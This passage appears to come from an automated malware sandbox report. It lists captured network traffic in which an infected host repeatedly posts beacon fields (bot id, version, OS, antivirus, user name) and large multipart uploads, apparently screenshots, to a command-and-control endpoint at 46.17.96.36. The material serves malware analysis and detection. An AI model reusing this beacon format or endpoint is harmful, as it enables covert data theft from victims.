              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ce51b85b4f9ae9a3c4604c72e2e1c4b9Host: 46.17.96.36Content-Length: 110607Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----eae9700a714e425f73995764be569cb3Host: 46.17.96.36Content-Length: 110906Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----756f3da479f67c608b77a871878871baHost: 46.17.96.36Content-Length: 111043Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----2527d6ee36e5d91ced907633b787976cHost: 46.17.96.36Content-Length: 110710Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----7f467d4e70cc44d532fe453c2d3923e5Host: 46.17.96.36Content-Length: 111116Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----7f467d4e70cc44d532fe453c2d3923e5Host: 46.17.96.36Content-Length: 111116Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----2527d6ee36e5d91ced907633b787976cHost: 46.17.96.36Content-Length: 110710Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----2527d6ee36e5d91ced907633b787976cHost: 46.17.96.36Content-Length: 110710Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----2527d6ee36e5d91ced907633b787976cHost: 46.17.96.36Content-Length: 110710Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----2527d6ee36e5d91ced907633b787976cHost: 46.17.96.36Content-Length: 110710Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----2527d6ee36e5d91ced907633b787976cHost: 46.17.96.36Content-Length: 110710Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----2527d6ee36e5d91ced907633b787976cHost: 46.17.96.36Content-Length: 110710Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----2c09df93ad9fbf4372f0aa685f89642fHost: 46.17.96.36Content-Length: 110773Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----2c09df93ad9fbf4372f0aa685f89642fHost: 46.17.96.36Content-Length: 110773Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----2c09df93ad9fbf4372f0aa685f89642fHost: 46.17.96.36Content-Length: 110773Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----2c09df93ad9fbf4372f0aa685f89642fHost: 46.17.96.36Content-Length: 110773Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----2c09df93ad9fbf4372f0aa685f89642fHost: 46.17.96.36Content-Length: 110773Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----2c09df93ad9fbf4372f0aa685f89642fHost: 46.17.96.36Content-Length: 110773Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----2c09df93ad9fbf4372f0aa685f89642fHost: 46.17.96.36Content-Length: 110773Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
